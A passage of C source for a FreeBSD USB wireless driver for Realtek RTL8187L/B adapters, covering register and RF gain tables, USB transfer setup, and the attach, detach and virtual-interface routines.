0xcf}, {0x272, 0x56}, {0x273, 0x9a}, {0x034, 0xf0}, {0x035, 0x0f}, {0x05b, 0x40}, {0x084, 0x88}, {0x085, 0x24}, {0x088, 0x54}, {0x08b, 0xb8}, {0x08c, 0x07}, {0x08d, 0x00}, {0x094, 0x1b}, {0x095, 0x12}, {0x096, 0x00}, {0x097, 0x06}, {0x09d, 0x1a}, {0x09f, 0x10}, {0x0b4, 0x22}, {0x0be, 0x80}, {0x0db, 0x00}, {0x0ee, 0x00}, {0x091, 0x03}, {0x24c, 0x00}, {0x39f, 0x00}, {0x08c, 0x01}, {0x08d, 0x10}, {0x08e, 0x08}, {0x08f, 0x00} }; static struct urtw_pair urtw_8225v2_rf_part2[] = { { 0x00, 0x01 }, { 0x01, 0x02 }, { 0x02, 0x42 }, { 0x03, 0x00 }, { 0x04, 0x00 }, { 0x05, 0x00 }, { 0x06, 0x40 }, { 0x07, 0x00 }, { 0x08, 0x40 }, { 0x09, 0xfe }, { 0x0a, 0x08 }, { 0x0b, 0x80 }, { 0x0c, 0x01 }, { 0x0d, 0x43 }, { 0x0e, 0xd3 }, { 0x0f, 0x38 }, { 0x10, 0x84 }, { 0x11, 0x07 }, { 0x12, 0x20 }, { 0x13, 0x20 }, { 0x14, 0x00 }, { 0x15, 0x40 }, { 0x16, 0x00 }, { 0x17, 0x40 }, { 0x18, 0xef }, { 0x19, 0x19 }, { 0x1a, 0x20 }, { 0x1b, 0x15 }, { 0x1c, 0x04 }, { 0x1d, 0xc5 }, { 0x1e, 0x95 }, { 0x1f, 0x75 }, { 0x20, 0x1f }, { 0x21, 0x17 }, { 0x22, 0x16 }, { 0x23, 0x80 }, { 0x24, 0x46 }, { 0x25, 0x00 }, { 0x26, 0x90 }, { 0x27, 0x88 } }; static struct urtw_pair urtw_8225v2b_rf_part2[] = { { 0x00, 0x10 }, { 0x01, 0x0d }, { 0x02, 0x01 }, { 0x03, 0x00 }, { 0x04, 0x14 }, { 0x05, 0xfb }, { 0x06, 0xfb }, { 0x07, 0x60 }, { 0x08, 0x00 }, { 0x09, 0x60 }, { 0x0a, 0x00 }, { 0x0b, 0x00 }, { 0x0c, 0x00 }, { 0x0d, 0x5c }, { 0x0e, 0x00 }, { 0x0f, 0x00 }, { 0x10, 0x40 }, { 0x11, 0x00 }, { 0x12, 0x40 }, { 0x13, 0x00 }, { 0x14, 0x00 }, { 0x15, 0x00 }, { 0x16, 0xa8 }, { 0x17, 0x26 }, { 0x18, 0x32 }, { 0x19, 0x33 }, { 0x1a, 0x07 }, { 0x1b, 0xa5 }, { 0x1c, 0x6f }, { 0x1d, 0x55 }, { 0x1e, 0xc8 }, { 0x1f, 0xb3 }, { 0x20, 0x0a }, { 0x21, 0xe1 }, { 0x22, 0x2C }, { 0x23, 0x8a }, { 0x24, 0x86 }, { 0x25, 0x83 }, { 0x26, 0x34 }, { 0x27, 0x0f }, { 0x28, 0x4f }, { 0x29, 0x24 }, { 0x2a, 0x6f }, { 0x2b, 0xc2 }, { 0x2c, 0x6b }, { 0x2d, 0x40 }, { 0x2e, 0x80 }, { 0x2f, 0x00 }, { 0x30, 0xc0 }, { 0x31, 0xc1 }, { 0x32, 0x58 }, { 0x33, 0xf1 }, { 0x34, 0x00 }, { 0x35, 0xe4 }, { 0x36, 0x90 }, { 0x37, 0x3e }, { 0x38, 0x6d }, { 0x39, 0x3c }, { 0x3a, 0xfb }, { 0x3b, 0x07 } }; static struct urtw_pair urtw_8225v2_rf_part3[] = { { 0x00, 0x98 }, { 0x03, 0x20 }, { 0x04, 0x7e }, { 0x05, 0x12 }, { 0x06, 0xfc }, { 0x07, 0x78 }, { 0x08, 0x2e }, { 0x09, 0x11 }, { 0x0a, 0x17 }, { 0x0b, 0x11 }, { 0x10, 0x9b }, { 0x11, 0x88 }, { 0x12, 0x47 }, { 0x13, 0xd0 }, { 0x19, 0x00 }, { 0x1a, 0xa0 }, { 0x1b, 0x08 }, { 0x1d, 0x00 }, { 0x40, 0x86 }, { 0x41, 0x9d }, { 0x42, 0x15 }, { 0x43, 0x18 }, { 0x44, 0x36 }, { 0x45, 0x35 }, { 0x46, 0x2e }, { 0x47, 0x25 }, { 0x48, 0x1c }, { 0x49, 0x12 }, { 0x4a, 0x09 }, { 0x4b, 0x04 }, { 0x4c, 0x05 } }; static 
uint16_t urtw_8225v2_rxgain[] = { 0x0000, 0x0001, 0x0002, 0x0003, 0x0004, 0x0005, 0x0008, 0x0009, 0x000a, 0x000b, 0x0102, 0x0103, 0x0104, 0x0105, 0x0140, 0x0141, 0x0142, 0x0143, 0x0144, 0x0145, 0x0180, 0x0181, 0x0182, 0x0183, 0x0184, 0x0185, 0x0188, 0x0189, 0x018a, 0x018b, 0x0243, 0x0244, 0x0245, 0x0280, 0x0281, 0x0282, 0x0283, 0x0284, 0x0285, 0x0288, 0x0289, 0x028a, 0x028b, 0x028c, 0x0342, 0x0343, 0x0344, 0x0345, 0x0380, 0x0381, 0x0382, 0x0383, 0x0384, 0x0385, 0x0388, 0x0389, 0x038a, 0x038b, 0x038c, 0x038d, 0x0390, 0x0391, 0x0392, 0x0393, 0x0394, 0x0395, 0x0398, 0x0399, 0x039a, 0x039b, 0x039c, 0x039d, 0x03a0, 0x03a1, 0x03a2, 0x03a3, 0x03a4, 0x03a5, 0x03a8, 0x03a9, 0x03aa, 0x03ab, 0x03ac, 0x03ad, 0x03b0, 0x03b1, 0x03b2, 0x03b3, 0x03b4, 0x03b5, 0x03b8, 0x03b9, 0x03ba, 0x03bb, 0x03bb }; static uint16_t urtw_8225v2b_rxgain[] = { 0x0400, 0x0401, 0x0402, 0x0403, 0x0404, 0x0405, 0x0408, 0x0409, 0x040a, 0x040b, 0x0502, 0x0503, 0x0504, 0x0505, 0x0540, 0x0541, 0x0542, 0x0543, 0x0544, 0x0545, 0x0580, 0x0581, 0x0582, 0x0583, 0x0584, 0x0585, 0x0588, 0x0589, 0x058a, 0x058b, 0x0643, 0x0644, 0x0645, 0x0680, 0x0681, 0x0682, 0x0683, 0x0684, 0x0685, 0x0688, 0x0689, 0x068a, 0x068b, 0x068c, 0x0742, 0x0743, 0x0744, 0x0745, 0x0780, 0x0781, 0x0782, 0x0783, 0x0784, 0x0785, 0x0788, 0x0789, 0x078a, 0x078b, 0x078c, 0x078d, 0x0790, 0x0791, 0x0792, 0x0793, 0x0794, 0x0795, 0x0798, 0x0799, 0x079a, 0x079b, 0x079c, 0x079d, 0x07a0, 0x07a1, 0x07a2, 0x07a3, 0x07a4, 0x07a5, 0x07a8, 0x07a9, 0x03aa, 0x03ab, 0x03ac, 0x03ad, 0x03b0, 0x03b1, 0x03b2, 0x03b3, 0x03b4, 0x03b5, 0x03b8, 0x03b9, 0x03ba, 0x03bb, 0x03bb }; static uint8_t urtw_8225v2_tx_gain_cck_ofdm[] = { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, }; static uint8_t urtw_8225v2_txpwr_cck[] = { 0x36, 0x35, 0x2e, 0x25, 0x1c, 0x12, 0x09, 0x04 }; static uint8_t urtw_8225v2_txpwr_cck_ch14[] = { 0x36, 0x35, 0x2e, 0x1b, 0x00, 0x00, 0x00, 0x00 }; static uint8_t urtw_8225v2b_txpwr_cck[] = { 0x36, 0x35, 0x2e, 0x25, 0x1c, 0x12, 0x09, 0x04, 0x30, 0x2f, 0x29, 0x21, 0x19, 0x10, 0x08, 0x03, 0x2b, 0x2a, 0x25, 0x1e, 0x16, 0x0e, 0x07, 0x03, 0x26, 0x25, 0x21, 0x1b, 0x14, 0x0d, 0x06, 0x03 }; static uint8_t urtw_8225v2b_txpwr_cck_ch14[] = { 0x36, 0x35, 0x2e, 0x1b, 0x00, 0x00, 0x00, 0x00, 0x30, 0x2f, 0x29, 0x15, 0x00, 0x00, 0x00, 0x00, 0x30, 0x2f, 0x29, 0x15, 0x00, 0x00, 0x00, 0x00, 0x30, 0x2f, 0x29, 0x15, 0x00, 0x00, 0x00, 0x00 }; static struct urtw_pair urtw_ratetable[] = { { 2, 0 }, { 4, 1 }, { 11, 2 }, { 12, 4 }, { 18, 5 }, { 22, 3 }, { 24, 6 }, { 36, 7 }, { 48, 8 }, { 72, 9 }, { 96, 10 }, { 108, 11 } }; #if 0 static const uint8_t urtw_8187b_reg_table[][3] = { { 0xf0, 0x32, 0 }, { 0xf1, 0x32, 0 }, { 0xf2, 0x00, 0 }, { 0xf3, 0x00, 0 }, { 0xf4, 0x32, 0 }, { 0xf5, 0x43, 0 }, { 0xf6, 0x00, 0 }, { 0xf7, 0x00, 0 }, { 0xf8, 0x46, 0 }, { 0xf9, 0xa4, 0 }, { 0xfa, 0x00, 0 }, { 0xfb, 0x00, 0 }, { 0xfc, 0x96, 0 }, { 0xfd, 0xa4, 0 }, { 0xfe, 0x00, 0 }, { 0xff, 0x00, 0 }, { 0x58, 0x4b, 1 }, { 0x59, 0x00, 1 }, { 0x5a, 0x4b, 1 }, { 0x5b, 0x00, 1 }, { 0x60, 0x4b, 1 }, { 0x61, 0x09, 1 }, { 0x62, 0x4b, 1 }, { 0x63, 0x09, 1 }, { 0xce, 0x0f, 1 }, { 0xcf, 0x00, 1 }, { 0xe0, 0xff, 1 }, { 0xe1, 0x0f, 1 }, { 0xe2, 0x00, 1 }, { 0xf0, 0x4e, 1 }, { 0xf1, 0x01, 1 }, { 0xf2, 0x02, 1 }, { 0xf3, 0x03, 1 }, { 0xf4, 0x04, 1 }, { 0xf5, 0x05, 1 }, { 0xf6, 0x06, 1 }, { 0xf7, 0x07, 1 }, { 0xf8, 0x08, 1 }, { 0x4e, 0x00, 2 }, { 0x0c, 0x04, 2 }, { 0x21, 0x61, 2 
}, { 0x22, 0x68, 2 }, { 0x23, 0x6f, 2 }, { 0x24, 0x76, 2 }, { 0x25, 0x7d, 2 }, { 0x26, 0x84, 2 }, { 0x27, 0x8d, 2 }, { 0x4d, 0x08, 2 }, { 0x50, 0x05, 2 }, { 0x51, 0xf5, 2 }, { 0x52, 0x04, 2 }, { 0x53, 0xa0, 2 }, { 0x54, 0x1f, 2 }, { 0x55, 0x23, 2 }, { 0x56, 0x45, 2 }, { 0x57, 0x67, 2 }, { 0x58, 0x08, 2 }, { 0x59, 0x08, 2 }, { 0x5a, 0x08, 2 }, { 0x5b, 0x08, 2 }, { 0x60, 0x08, 2 }, { 0x61, 0x08, 2 }, { 0x62, 0x08, 2 }, { 0x63, 0x08, 2 }, { 0x64, 0xcf, 2 }, { 0x72, 0x56, 2 }, { 0x73, 0x9a, 2 }, { 0x34, 0xf0, 0 }, { 0x35, 0x0f, 0 }, { 0x5b, 0x40, 0 }, { 0x84, 0x88, 0 }, { 0x85, 0x24, 0 }, { 0x88, 0x54, 0 }, { 0x8b, 0xb8, 0 }, { 0x8c, 0x07, 0 }, { 0x8d, 0x00, 0 }, { 0x94, 0x1b, 0 }, { 0x95, 0x12, 0 }, { 0x96, 0x00, 0 }, { 0x97, 0x06, 0 }, { 0x9d, 0x1a, 0 }, { 0x9f, 0x10, 0 }, { 0xb4, 0x22, 0 }, { 0xbe, 0x80, 0 }, { 0xdb, 0x00, 0 }, { 0xee, 0x00, 0 }, { 0x91, 0x03, 0 }, { 0x4c, 0x00, 2 }, { 0x9f, 0x00, 3 }, { 0x8c, 0x01, 0 }, { 0x8d, 0x10, 0 }, { 0x8e, 0x08, 0 }, { 0x8f, 0x00, 0 } }; #endif static usb_callback_t urtw_bulk_rx_callback; static usb_callback_t urtw_bulk_tx_callback; static usb_callback_t urtw_bulk_tx_status_callback; static const struct usb_config urtw_8187b_usbconfig[URTW_8187B_N_XFERS] = { [URTW_8187B_BULK_RX] = { .type = UE_BULK, .endpoint = 0x83, .direction = UE_DIR_IN, .bufsize = MCLBYTES, .flags = { .ext_buffer = 1, .pipe_bof = 1, .short_xfer_ok = 1 }, .callback = urtw_bulk_rx_callback }, [URTW_8187B_BULK_TX_STATUS] = { .type = UE_BULK, .endpoint = 0x89, .direction = UE_DIR_IN, .bufsize = sizeof(uint64_t), .flags = { .pipe_bof = 1, .short_xfer_ok = 1 }, .callback = urtw_bulk_tx_status_callback }, [URTW_8187B_BULK_TX_BE] = { .type = UE_BULK, .endpoint = URTW_8187B_TXPIPE_BE, .direction = UE_DIR_OUT, .bufsize = URTW_TX_MAXSIZE * URTW_TX_DATA_LIST_COUNT, .flags = { .force_short_xfer = 1, .pipe_bof = 1, }, .callback = urtw_bulk_tx_callback, .timeout = URTW_DATA_TIMEOUT }, [URTW_8187B_BULK_TX_BK] = { .type = UE_BULK, .endpoint = URTW_8187B_TXPIPE_BK, .direction = UE_DIR_OUT, .bufsize = URTW_TX_MAXSIZE, .flags = { .ext_buffer = 1, .force_short_xfer = 1, .pipe_bof = 1, }, .callback = urtw_bulk_tx_callback, .timeout = URTW_DATA_TIMEOUT }, [URTW_8187B_BULK_TX_VI] = { .type = UE_BULK, .endpoint = URTW_8187B_TXPIPE_VI, .direction = UE_DIR_OUT, .bufsize = URTW_TX_MAXSIZE, .flags = { .ext_buffer = 1, .force_short_xfer = 1, .pipe_bof = 1, }, .callback = urtw_bulk_tx_callback, .timeout = URTW_DATA_TIMEOUT }, [URTW_8187B_BULK_TX_VO] = { .type = UE_BULK, .endpoint = URTW_8187B_TXPIPE_VO, .direction = UE_DIR_OUT, .bufsize = URTW_TX_MAXSIZE, .flags = { .ext_buffer = 1, .force_short_xfer = 1, .pipe_bof = 1, }, .callback = urtw_bulk_tx_callback, .timeout = URTW_DATA_TIMEOUT }, [URTW_8187B_BULK_TX_EP12] = { .type = UE_BULK, .endpoint = 0xc, .direction = UE_DIR_OUT, .bufsize = URTW_TX_MAXSIZE, .flags = { .ext_buffer = 1, .force_short_xfer = 1, .pipe_bof = 1, }, .callback = urtw_bulk_tx_callback, .timeout = URTW_DATA_TIMEOUT } }; static const struct usb_config urtw_8187l_usbconfig[URTW_8187L_N_XFERS] = { [URTW_8187L_BULK_RX] = { .type = UE_BULK, .endpoint = 0x81, .direction = UE_DIR_IN, .bufsize = MCLBYTES, .flags = { .ext_buffer = 1, .pipe_bof = 1, .short_xfer_ok = 1 }, .callback = urtw_bulk_rx_callback }, [URTW_8187L_BULK_TX_LOW] = { .type = UE_BULK, .endpoint = 0x2, .direction = UE_DIR_OUT, .bufsize = URTW_TX_MAXSIZE * URTW_TX_DATA_LIST_COUNT, .flags = { .force_short_xfer = 1, .pipe_bof = 1, }, .callback = urtw_bulk_tx_callback, .timeout = URTW_DATA_TIMEOUT }, [URTW_8187L_BULK_TX_NORMAL] = { .type 
= UE_BULK, .endpoint = 0x3, .direction = UE_DIR_OUT, .bufsize = URTW_TX_MAXSIZE, .flags = { .ext_buffer = 1, .force_short_xfer = 1, .pipe_bof = 1, }, .callback = urtw_bulk_tx_callback, .timeout = URTW_DATA_TIMEOUT }, }; static struct ieee80211vap *urtw_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void urtw_vap_delete(struct ieee80211vap *); static void urtw_init(void *); static void urtw_stop(struct ifnet *); static void urtw_stop_locked(struct ifnet *); static int urtw_ioctl(struct ifnet *, u_long, caddr_t); static void urtw_start(struct ifnet *); static int urtw_alloc_rx_data_list(struct urtw_softc *); static int urtw_alloc_tx_data_list(struct urtw_softc *); static int urtw_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void urtw_scan_start(struct ieee80211com *); static void urtw_scan_end(struct ieee80211com *); static void urtw_set_channel(struct ieee80211com *); static void urtw_update_mcast(struct ifnet *); static int urtw_tx_start(struct urtw_softc *, struct ieee80211_node *, struct mbuf *, struct urtw_data *, int); static int urtw_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void urtw_led_ch(void *); static void urtw_ledtask(void *, int); static void urtw_watchdog(void *); static void urtw_set_multi(void *); static int urtw_isbmode(uint16_t); static uint16_t urtw_rate2rtl(uint32_t); static uint16_t urtw_rtl2rate(uint32_t); static usb_error_t urtw_set_rate(struct urtw_softc *); static usb_error_t urtw_update_msr(struct urtw_softc *); static usb_error_t urtw_read8_c(struct urtw_softc *, int, uint8_t *); static usb_error_t urtw_read16_c(struct urtw_softc *, int, uint16_t *); static usb_error_t urtw_read32_c(struct urtw_softc *, int, uint32_t *); static usb_error_t urtw_write8_c(struct urtw_softc *, int, uint8_t); static usb_error_t urtw_write16_c(struct urtw_softc *, int, uint16_t); static usb_error_t urtw_write32_c(struct urtw_softc *, int, uint32_t); static usb_error_t urtw_eprom_cs(struct urtw_softc *, int); static usb_error_t urtw_eprom_ck(struct urtw_softc *); static usb_error_t urtw_eprom_sendbits(struct urtw_softc *, int16_t *, int); static usb_error_t urtw_eprom_read32(struct urtw_softc *, uint32_t, uint32_t *); static usb_error_t urtw_eprom_readbit(struct urtw_softc *, int16_t *); static usb_error_t urtw_eprom_writebit(struct urtw_softc *, int16_t); static usb_error_t urtw_get_macaddr(struct urtw_softc *); static usb_error_t urtw_get_txpwr(struct urtw_softc *); static usb_error_t urtw_get_rfchip(struct urtw_softc *); static usb_error_t urtw_led_init(struct urtw_softc *); static usb_error_t urtw_8185_rf_pins_enable(struct urtw_softc *); static usb_error_t urtw_8185_tx_antenna(struct urtw_softc *, uint8_t); static usb_error_t urtw_8187_write_phy(struct urtw_softc *, uint8_t, uint32_t); static usb_error_t urtw_8187_write_phy_ofdm_c(struct urtw_softc *, uint8_t, uint32_t); static usb_error_t urtw_8187_write_phy_cck_c(struct urtw_softc *, uint8_t, uint32_t); static usb_error_t urtw_8225_setgain(struct urtw_softc *, int16_t); static usb_error_t urtw_8225_usb_init(struct urtw_softc *); static usb_error_t urtw_8225_write_c(struct urtw_softc *, uint8_t, uint16_t); static usb_error_t urtw_8225_write_s16(struct urtw_softc *, uint8_t, int, uint16_t *); static usb_error_t urtw_8225_read(struct urtw_softc *, uint8_t, uint32_t *); static usb_error_t urtw_8225_rf_init(struct urtw_softc *); static 
usb_error_t urtw_8225_rf_set_chan(struct urtw_softc *, int); static usb_error_t urtw_8225_rf_set_sens(struct urtw_softc *, int); static usb_error_t urtw_8225_set_txpwrlvl(struct urtw_softc *, int); static usb_error_t urtw_8225_rf_stop(struct urtw_softc *); static usb_error_t urtw_8225v2_rf_init(struct urtw_softc *); static usb_error_t urtw_8225v2_rf_set_chan(struct urtw_softc *, int); static usb_error_t urtw_8225v2_set_txpwrlvl(struct urtw_softc *, int); static usb_error_t urtw_8225v2_setgain(struct urtw_softc *, int16_t); static usb_error_t urtw_8225_isv2(struct urtw_softc *, int *); static usb_error_t urtw_8225v2b_rf_init(struct urtw_softc *); static usb_error_t urtw_8225v2b_rf_set_chan(struct urtw_softc *, int); static usb_error_t urtw_read8e(struct urtw_softc *, int, uint8_t *); static usb_error_t urtw_write8e(struct urtw_softc *, int, uint8_t); static usb_error_t urtw_8180_set_anaparam(struct urtw_softc *, uint32_t); static usb_error_t urtw_8185_set_anaparam2(struct urtw_softc *, uint32_t); static usb_error_t urtw_intr_enable(struct urtw_softc *); static usb_error_t urtw_intr_disable(struct urtw_softc *); static usb_error_t urtw_reset(struct urtw_softc *); static usb_error_t urtw_led_on(struct urtw_softc *, int); static usb_error_t urtw_led_ctl(struct urtw_softc *, int); static usb_error_t urtw_led_blink(struct urtw_softc *); static usb_error_t urtw_led_mode0(struct urtw_softc *, int); static usb_error_t urtw_led_mode1(struct urtw_softc *, int); static usb_error_t urtw_led_mode2(struct urtw_softc *, int); static usb_error_t urtw_led_mode3(struct urtw_softc *, int); static usb_error_t urtw_rx_setconf(struct urtw_softc *); static usb_error_t urtw_rx_enable(struct urtw_softc *); static usb_error_t urtw_tx_enable(struct urtw_softc *sc); static void urtw_free_tx_data_list(struct urtw_softc *); static void urtw_free_rx_data_list(struct urtw_softc *); static void urtw_free_data_list(struct urtw_softc *, struct urtw_data data[], int, int); static usb_error_t urtw_adapter_start(struct urtw_softc *); static usb_error_t urtw_adapter_start_b(struct urtw_softc *); static usb_error_t urtw_set_mode(struct urtw_softc *, uint32_t); static usb_error_t urtw_8187b_cmd_reset(struct urtw_softc *); static usb_error_t urtw_do_request(struct urtw_softc *, struct usb_device_request *, void *); static usb_error_t urtw_8225v2b_set_txpwrlvl(struct urtw_softc *, int); static usb_error_t urtw_led_off(struct urtw_softc *, int); static void urtw_abort_xfers(struct urtw_softc *); static struct urtw_data * urtw_getbuf(struct urtw_softc *sc); static int urtw_compute_txtime(uint16_t, uint16_t, uint8_t, uint8_t); static void urtw_updateslot(struct ifnet *); static void urtw_updateslottask(void *, int); static void urtw_sysctl_node(struct urtw_softc *); static int urtw_match(device_t dev) { struct usb_attach_arg *uaa = device_get_ivars(dev); if (uaa->usb_mode != USB_MODE_HOST) return (ENXIO); if (uaa->info.bConfigIndex != URTW_CONFIG_INDEX) return (ENXIO); if (uaa->info.bIfaceIndex != URTW_IFACE_INDEX) return (ENXIO); return (usbd_lookup_id_by_uaa(urtw_devs, sizeof(urtw_devs), uaa)); } static int urtw_attach(device_t dev) { const struct usb_config *setup_start; int ret = ENXIO; struct urtw_softc *sc = device_get_softc(dev); struct usb_attach_arg *uaa = device_get_ivars(dev); struct ieee80211com *ic; struct ifnet *ifp; uint8_t bands, iface_index = URTW_IFACE_INDEX; /* XXX */ uint16_t n_setup; uint32_t data; usb_error_t error; device_set_usb_desc(dev); sc->sc_dev = dev; sc->sc_udev = uaa->device; if (USB_GET_DRIVER_INFO(uaa) 
== URTW_REV_RTL8187B) sc->sc_flags |= URTW_RTL8187B; #ifdef URTW_DEBUG sc->sc_debug = urtw_debug; #endif mtx_init(&sc->sc_mtx, device_get_nameunit(sc->sc_dev), MTX_NETWORK_LOCK, MTX_DEF); usb_callout_init_mtx(&sc->sc_led_ch, &sc->sc_mtx, 0); TASK_INIT(&sc->sc_led_task, 0, urtw_ledtask, sc); TASK_INIT(&sc->sc_updateslot_task, 0, urtw_updateslottask, sc); callout_init(&sc->sc_watchdog_ch, 0); if (sc->sc_flags & URTW_RTL8187B) { setup_start = urtw_8187b_usbconfig; n_setup = URTW_8187B_N_XFERS; } else { setup_start = urtw_8187l_usbconfig; n_setup = URTW_8187L_N_XFERS; } error = usbd_transfer_setup(uaa->device, &iface_index, sc->sc_xfer, setup_start, n_setup, sc, &sc->sc_mtx); if (error) { device_printf(dev, "could not allocate USB transfers, " "err=%s\n", usbd_errstr(error)); ret = ENXIO; goto fail0; } if (sc->sc_flags & URTW_RTL8187B) { sc->sc_tx_dma_buf = usbd_xfer_get_frame_buffer(sc->sc_xfer[ URTW_8187B_BULK_TX_BE], 0); } else { sc->sc_tx_dma_buf = usbd_xfer_get_frame_buffer(sc->sc_xfer[ URTW_8187L_BULK_TX_LOW], 0); } URTW_LOCK(sc); urtw_read32_m(sc, URTW_RX, &data); sc->sc_epromtype = (data & URTW_RX_9356SEL) ? URTW_EEPROM_93C56 : URTW_EEPROM_93C46; error = urtw_get_rfchip(sc); if (error != 0) goto fail; error = urtw_get_macaddr(sc); if (error != 0) goto fail; error = urtw_get_txpwr(sc); if (error != 0) goto fail; error = urtw_led_init(sc); if (error != 0) goto fail; URTW_UNLOCK(sc); sc->sc_rts_retry = URTW_DEFAULT_RTS_RETRY; sc->sc_tx_retry = URTW_DEFAULT_TX_RETRY; sc->sc_currate = 3; sc->sc_preamble_mode = urtw_preamble_mode; ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not allocate ifnet\n"); ret = ENOMEM; goto fail1; } ifp->if_softc = sc; if_initname(ifp, "urtw", device_get_unit(sc->sc_dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = urtw_init; ifp->if_ioctl = urtw_ioctl; ifp->if_start = urtw_start; /* XXX URTW_TX_DATA_LIST_COUNT */ IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic = ifp->if_l2com; ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ ic->ic_opmode = IEEE80211_M_STA; /* default to BSS mode */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA | /* station mode */ IEEE80211_C_MONITOR | /* monitor mode supported */ IEEE80211_C_TXPMGT | /* tx power management */ IEEE80211_C_SHPREAMBLE | /* short preamble supported */ IEEE80211_C_SHSLOT | /* short slot time supported */ IEEE80211_C_BGSCAN | /* capable of bg scanning */ IEEE80211_C_WPA; /* 802.11i */ bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, sc->sc_bssid); ic->ic_raw_xmit = urtw_raw_xmit; ic->ic_scan_start = urtw_scan_start; ic->ic_scan_end = urtw_scan_end; ic->ic_set_channel = urtw_set_channel; ic->ic_updateslot = urtw_updateslot; ic->ic_vap_create = urtw_vap_create; ic->ic_vap_delete = urtw_vap_delete; ic->ic_update_mcast = urtw_update_mcast; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), URTW_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), URTW_RX_RADIOTAP_PRESENT); urtw_sysctl_node(sc); if (bootverbose) ieee80211_announce(ic); return (0); fail: URTW_UNLOCK(sc); fail1: usbd_transfer_unsetup(sc->sc_xfer, (sc->sc_flags & URTW_RTL8187B) ? 
URTW_8187B_N_XFERS : URTW_8187L_N_XFERS); fail0: return (ret); } static int urtw_detach(device_t dev) { struct urtw_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; unsigned int x; unsigned int n_xfers; /* Prevent further ioctls */ URTW_LOCK(sc); sc->sc_flags |= URTW_DETACHED; URTW_UNLOCK(sc); urtw_stop(ifp); ieee80211_draintask(ic, &sc->sc_updateslot_task); ieee80211_draintask(ic, &sc->sc_led_task); usb_callout_drain(&sc->sc_led_ch); callout_drain(&sc->sc_watchdog_ch); n_xfers = (sc->sc_flags & URTW_RTL8187B) ? URTW_8187B_N_XFERS : URTW_8187L_N_XFERS; /* prevent further allocations from RX/TX data lists */ URTW_LOCK(sc); STAILQ_INIT(&sc->sc_tx_active); STAILQ_INIT(&sc->sc_tx_inactive); STAILQ_INIT(&sc->sc_tx_pending); STAILQ_INIT(&sc->sc_rx_active); STAILQ_INIT(&sc->sc_rx_inactive); URTW_UNLOCK(sc); /* drain USB transfers */ for (x = 0; x != n_xfers; x++) usbd_transfer_drain(sc->sc_xfer[x]); /* free data buffers */ URTW_LOCK(sc); urtw_free_tx_data_list(sc); urtw_free_rx_data_list(sc); URTW_UNLOCK(sc); /* free USB transfers and some data buffers */ usbd_transfer_unsetup(sc->sc_xfer, n_xfers); ieee80211_ifdetach(ic); if_free(ifp); mtx_destroy(&sc->sc_mtx); return (0); } static void urtw_free_tx_data_list(struct urtw_softc *sc) { urtw_free_data_list(sc, sc->sc_tx, URTW_TX_DATA_LIST_COUNT, 0); } static void urtw_free_rx_data_list(struct urtw_softc *sc) { urtw_free_data_list(sc, sc->sc_rx, URTW_RX_DATA_LIST_COUNT, 1); } static void urtw_free_data_list(struct urtw_softc *sc, struct urtw_data data[], int ndata, int fillmbuf) { int i; for (i = 0; i < ndata; i++) { struct urtw_data *dp = &data[i]; if (fillmbuf == 1) { if (dp->m != NULL) { m_freem(dp->m); dp->m = NULL; dp->buf = NULL; } } else { dp->buf = NULL; } if (dp->ni != NULL) { ieee80211_free_node(dp->ni); dp->ni = NULL; } } } static struct ieee80211vap * urtw_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct urtw_vap *uvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return (NULL); uvp = (struct urtw_vap *) malloc(sizeof(struct urtw_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (uvp == NULL) return (NULL); vap = &uvp->vap; /* enable s/w bmiss handling for sta mode */ if (ieee80211_vap_setup(ic, vap, name, unit, opmode, flags | IEEE80211_CLONE_NOBEACONS, bssid, mac) != 0) { /* out of memory */ free(uvp, M_80211_VAP); return (NULL); } /* override state transition machine */ uvp->newstate = vap->iv_newstate; vap->iv_newstate = urtw_newstate; /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return (vap); } static void urtw_vap_delete(struct ieee80211vap *vap) { struct urtw_vap *uvp = URTW_VAP(vap); ieee80211_vap_detach(vap); free(uvp, M_80211_VAP); } static void urtw_init_locked(void *arg) { int ret; struct urtw_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; usb_error_t error; if (ifp->if_drv_flags & IFF_DRV_RUNNING) urtw_stop_locked(ifp); error = (sc->sc_flags & URTW_RTL8187B) ? 
